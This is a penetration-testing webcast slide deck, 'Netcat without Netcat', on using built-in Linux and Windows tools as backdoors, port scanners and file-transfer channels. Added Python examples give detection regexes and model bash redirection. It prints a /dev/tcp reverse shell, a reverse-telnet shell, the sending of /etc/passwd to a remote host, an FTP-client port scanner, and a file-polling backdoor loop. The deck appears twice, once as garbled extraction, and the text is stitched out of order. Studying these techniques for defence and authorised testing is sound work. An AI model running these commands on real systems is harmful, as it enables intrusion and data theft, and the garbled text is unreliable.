• See the first webcast in this series for details on how these work… we won't go through them again here
Windows Port Scanner Using Telnet Client
• We could systematically telnet to port after port:
  – C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address?
  – Watch it… When it stops, hit CTRL-[ and then type quit to resume
  – Or kill the telnet client every 5 seconds:
    • C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
  – Downside: Race condition may kill one that hasn't finished checking
More Problems with Windows Telnet Client as a Port Scanner
• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of the telnet client
      – Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logs… No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include the telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way
Windows Port Scanner Using FTP Client
• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line… only connects to TCP port 21
• Solution: But you can specify the dest port in an FTP command file:
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration
The Windows Command Line Port Scanner Using FTP Client
• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly
Making It Store Results
• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
Windows Command-Line File Transfer
• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares:
  C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials…
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files
File Transfer in Action
Backdoors: The File Shell
• Now, let's do a backdoor
• Listening on a port is hard…
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command, and dump output to another file:
• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Using the File Shell
• Now, we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
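Added detection-side example (not code from the webcast): one regex rule for each command-line pattern the slides above describe, from the /dev/tcp redirection and reverse-telnet pipeline on Linux through the FTP-client sweep, the wmic kill loop, the UNC-share redirect and the file-shell polling loop on Windows, run over constructed sample command lines. The input format (one process command line per string) and the 192.0.2.10 address are assumptions, not tied to any logging product or real host.

```python
"""Detection rules for the Netcat-without-Netcat command-line patterns in
this deck. Added example, not code from the webcast. The input format (one
process command line per string) is an assumption, not any product's log
schema; the sample command lines are constructed and use the RFC 5737
documentation address 192.0.2.10."""
import re
from typing import List, NamedTuple, Tuple


class Finding(NamedTuple):
    rule: str
    command: str


# One rule per technique, as (rule name, compiled regex).
RULES: List[Tuple[str, re.Pattern]] = [
    # Linux: bash redirection to /dev/tcp or /dev/udp (file transfer,
    # single-port check, while-loop port scan)
    ("bash_dev_tcp_redirect",
     re.compile(r"/dev/(tcp|udp)/[^/\s]+/\S+")),
    # Linux: interactive bash with stdin and stderr tied to the socket
    ("bash_dev_tcp_reverse_shell",
     re.compile(r"bash\s+-i\b.*/dev/tcp/.*0<&1.*2>&1")),
    # Linux: reverse telnet, i.e. telnet | shell | telnet
    ("reverse_telnet_pipeline",
     re.compile(r"telnet\b[^|]*\|\s*(/bin/)?(ba)?sh\b[^|]*\|\s*telnet\b")),
    # Windows: FOR /L writing "open host port" into a script run by ftp -s:
    ("ftp_script_port_sweep",
     re.compile(r"for\s+/L\b.*echo\s+open\s+\S+\s+%+\w.*ftp\s+-s:", re.I)),
    # Windows: loop that repeatedly kills telnet.exe through wmic
    ("wmic_kill_telnet_loop",
     re.compile(r"wmic\s+process\s+where\s+name=\"?telnet\.exe\"?\s+delete",
                re.I)),
    # Windows: endless FOR /L (1,0,2) that runs lines from a command file
    # and appends output to another file (the file shell)
    ("file_shell_polling_loop",
     re.compile(r"for\s+/L\s+%+\w\s+in\s+\(\s*1\s*,\s*0\s*,\s*2\s*\)"
                r".*for\s+/f\b.*cmd(\.exe)?\s+/c\s+%+\w.*>>", re.I)),
    # Windows: command output redirected straight onto a UNC share
    ("output_redirect_to_unc_share",
     re.compile(r">\s*\\\\[^\\\s]+\\[^\\\s]+\\\S+")),
]


def scan_command(command: str) -> List[str]:
    """Names of every rule matching one command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(command)]


def scan_commands(commands: List[str]) -> List[Finding]:
    """Run every rule over every command line; one Finding per hit."""
    return [Finding(name, cmd)
            for cmd in commands for name in scan_command(cmd)]


# Constructed samples: the deck's techniques with placeholder values filled in.
SUSPECT = [
    "cat /etc/passwd > /dev/tcp/192.0.2.10/443",
    "/bin/bash -i > /dev/tcp/192.0.2.10/443 0<&1 2>&1",
    "telnet 192.0.2.10 8000 | /bin/bash | telnet 192.0.2.10 8001",
    r"for /L %i in (1,1,1024) do echo open 192.0.2.10 %i > ftp.txt "
    r"& echo quit >> ftp.txt & ftp -s:ftp.txt",
    r'for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete '
    r"& ping -n 6 127.0.0.1",
    r'for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) '
    r"do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1",
    r"type secrets.txt > \\192.0.2.10\share\secrets.txt",
]

# Constructed benign look-alikes that must not fire.
BENIGN = [
    "tar czf /tmp/etc-backup.tgz /etc",
    "echo started > /var/log/dev/tcp.log",
    "telnet mailhost 25",
    r"for /L %i in (1,1,5) do echo %i",
    r"copy report.docx \\fileserver\public\report.docx",
]

if __name__ == "__main__":
    for f in scan_commands(SUSPECT + BENIGN):
        print(f"{f.rule:30} {f.command}")
```

These rules key on the literal shapes shown in the deck; real process-creation telemetry (for example Sysmon event 1 or auditd execve records) would first need its command-line field extracted into the string form used here.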
The File Shell In Action
Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A
Conclusions
• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals
Follow-Up
• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to the 560 course through August:
  – June 4-9: Las Vegas, NV (Skoudis)
  – June 12-July 22: Home On-Line (Skoudis)
  – July 24-29: Wash DC (Skoudis)
  – Aug 11-16: Boston (Shackleford)
  – Aug 18-23: Minneapolis (Conrad)
  – Aug 24-29: Va Beach (Strand)
• Go to www.sans.org and look for "560" for details
Outline
• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008
Page 6
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 639Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 6
Software for Testing ndash
Free Test Tools
bull Bootable Linux environments can be very helpful ndash Someone has gone through the difficulty of compilingand installing various tools to make everything work
ndash On of my favorites is Backtrack free athttpwwwremote-exploitorgbacktrackhtml
bull Other free sources of tools
ndash Milw0rm ndash wwwmilw0rmcombull Exploits sorted by OS date localremote etc
ndash Packetstorm Security ndash httppacketstormsecurityorgbull Vast history of attack and defense tools
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 739Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 7
Commercial Toolsbull There are numerous useful commercial tools
available for pen testers providing ndash Typically higher quality and more frequent updates
ndash Support ndash very important for professional testing
bull Useful examples include ndash CORE IMPACT ndash OS network services client-side
and web app exploitation
ndash Tenable Securityrsquos commercialized Nessus ndash OSand network services vulnerability scan
ndash HP SPI Dynamicsrsquo WebInspect ndash web app
vulnerability discovery and exploit
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8
Testing Network
Infrastructure - ISPbull For internal testing a fast connection near a backbone with
minimal filtering is idealbull For Internet-based testing you will need to send packets
through your ISP to the target
ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation
bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems
bull Can seriously impair your ability to test and the accuracy of your results
bull Tell your ISP that you plan to do pen tests and ask if theyblock
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10
What is Netcat
bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows
bull Takes Standard In and sends it across the network
bull Receives data from the network and puts it onStandard Out
bull Messages from Netcat itself put on Standard Error
NetcatStd Out Receive packets
Std In Send packets
Std Err
The
System
The
Network
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11
What Can Netcat Do for Usbull Send files
bull Port scan
bull Backdoor shell access
bull Connecting to arbitrary open portsbull Vulnerability scanning
bull Simple chats
bull Replay data in TCP or UDP packets
bull Relays bouncing between systems
bull Much much morehellip
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors: The File Shell
• Now, let's do a backdoor
• Listening on a port is hard…
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command, and dump output to another file
• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Using the File Shell
• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
The File Shell In Action
Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A
Conclusions
• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals
Follow-Up
• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to 560 course through August
  – June 4-9, Las Vegas, NV, Skoudis
  – June 12-July 22, Home (On-Line), Skoudis
  – July 24-29, Wash DC, Skoudis
  – Aug 11-16, Boston, Shackleford
  – Aug 18-23, Minneapolis, Conrad
  – Aug 24-29, Va Beach, Strand
• Go to www.sans.org and look for "560" for details
Outline
• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008
Commercial Tools
• There are numerous useful commercial tools available for pen testers, providing:
  – Typically higher quality and more frequent updates
  – Support – very important for professional testing
• Useful examples include:
  – CORE IMPACT – OS, network services, client-side, and web app exploitation
  – Tenable Security's commercialized Nessus – OS and network services vulnerability scan
  – HP SPI Dynamics' WebInspect – web app vulnerability discovery and exploit
Testing Network Infrastructure - ISP
• For internal testing, a fast connection near a backbone with minimal filtering is ideal
• For Internet-based testing, you will need to send packets through your ISP to the target
  – Scanning – large number of sometimes unusual packets
  – Exploitation
• Some ISPs detect scanning or exploits and then block them
  – Some do this with network-based Intrusion Prevention Systems
• Can seriously impair your ability to test and the accuracy of your results
• Tell your ISP that you plan to do pen tests and ask if they block
Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A
What is Netcat?
• Netcat: General-purpose TCP and UDP network widget, running on Linux/Unix and Windows
• Takes Standard In and sends it across the network
• Receives data from the network and puts it on Standard Out
• Messages from Netcat itself put on Standard Error
[Figure: Netcat sits between The System and The Network; Std In feeds "Send packets", "Receive packets" feeds Std Out, and Netcat's own messages go to Std Err]
What Can Netcat Do for Us?
• Send files
• Port scan
• Backdoor shell access
• Connecting to arbitrary open ports
• Vulnerability scanning
• Simple chats
• Replay data in TCP or UDP packets
• Relays bouncing between systems
• Much, much more…
What Is Netcat Without Netcat?
• Netcat without Netcat involves constructing commands that achieve Netcat behavior…
  – …without the use of Netcat
• We'll rely on built-in tools only
• Remember those old AT&T commercials?
  – Have you ever kissed your baby goodnight… from a payphone?
  – Have you ever made a command shell backdoor using Linux's /dev/tcp?
  – Have you ever shoveled shell using Linux telnet clients?
  – Have you ever made a port scanner using a Windows FTP client?
  – Have you ever made the Windows file system behave like a command shell?
• YOU WILL
Why Netcat without Netcat?
• For penetration testers:
  – Netcat functionality is very useful in making one system attack another machine
  – But the project's rules of engagement may prohibit installation of additional software such as Netcat on compromised targets
  – Some anti-virus tools detect and block Netcat
  – Live off the land: Be a command-line MacGyver
  – Where we're going, we don't need Netcat
[Figure: the Attacker gains shell access on a Conquered Target, then uses it to scan, analyze, and exploit the Next Target]
Useful Netcat Functions
• As we've seen, Netcat can be used in countless different ways
• Let's pick some of the most useful and see how we can make built-in tools do each function on Linux and Windows:
  – Backdoor shell
  – File transfer
  – Port scanner
• We'll vary the order in which we do each action, as we'll build from fundamental principles to more complex techniques
  – And the order of those principles differs between Linux and Windows
Linux
• /dev/tcp rocks
• On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
  – Opens a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior
Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
  $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener
Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor:
  /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to attacker's waiting Netcat listener, where commands can be entered
[Figure: a Protected Server behind a firewall that blocks incoming connections runs /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1; the attacker's machine runs nc -l -p [p], the attacker types commands there, and they are executed on the server]
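The three redirections on this slide only work in the order shown, because bash applies redirection words left to right and a duplication such as 0<&1 copies whatever fd 1 refers to at that instant. The following Python model of that process is an added example, not part of the original slides or of any tool they mention: it tracks the three standard descriptors through each redirection word and shows that the slide's order puts all of them on the /dev/tcp endpoint, while the same words with the duplications first leave stdin and stderr on the terminal. The endpoint string and the "tty" label are constructed placeholders; knowing this wiring is also what lets a defender read such a command line in a process log and tell a fully interactive reverse shell from a one-way output push.

```python
import re

TTY = "tty"  # constructed label for the controlling terminal every descriptor starts on

# One redirection word: optional fd number, operator, optional '&' for duplication, target
REDIR = re.compile(r"(\d*)(>>|>|<)(&?)(.+)")


def apply_redirections(words, table=None):
    """Apply bash redirection words left to right and return the resulting fd table.

    Supported forms: [n]>file, [n]>>file, [n]<file, [n]>&m, [n]<&m.
    Without an explicit n, '>' and '>>' act on fd 1 and '<' on fd 0, as in bash.
    A duplication copies what m refers to at that moment, so word order matters.
    """
    table = dict(table) if table is not None else {0: TTY, 1: TTY, 2: TTY}
    for word in words:
        m = REDIR.fullmatch(word)
        if m is None:
            raise ValueError(f"unsupported redirection: {word!r}")
        fd_text, op, dup, target = m.groups()
        fd = int(fd_text) if fd_text else (0 if op == "<" else 1)
        if dup:
            table[fd] = table[int(target)]  # [n]>&m or [n]<&m: fd n becomes a copy of fd m
        else:
            table[fd] = target              # [n]>file or [n]<file: fd n now refers to the file
    return table


def wire_reverse_shell(endpoint):
    """The slide's order: > endpoint, then 0<&1, then 2>&1."""
    return apply_redirections([f">{endpoint}", "0<&1", "2>&1"])


def wire_wrong_order(endpoint):
    """Same words, duplications first: they copy the terminal, not the endpoint."""
    return apply_redirections(["0<&1", "2>&1", f">{endpoint}"])


def fully_wired(table, endpoint):
    """True when stdin, stdout and stderr all refer to the endpoint."""
    return all(table[fd] == endpoint for fd in (0, 1, 2))


if __name__ == "__main__":
    ep = "/dev/tcp/[Attacker_IPaddr]/[port]"  # placeholder endpoint from the slide
    for label, table in (("slide order", wire_reverse_shell(ep)),
                         ("dups first", wire_wrong_order(ep))):
        print(f"{label:12} fd0={table[0]}  fd1={table[1]}  fd2={table[2]}")
```

The same model explains the everyday `cmd > file 2>&1` versus `cmd 2>&1 > file` difference: in the second form fd 2 is copied while fd 1 still points at the terminal, so stderr never reaches the file.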
Linux Command-Line Reverse Shell Backdoor In Action
Linux Command-Line Port Scanner
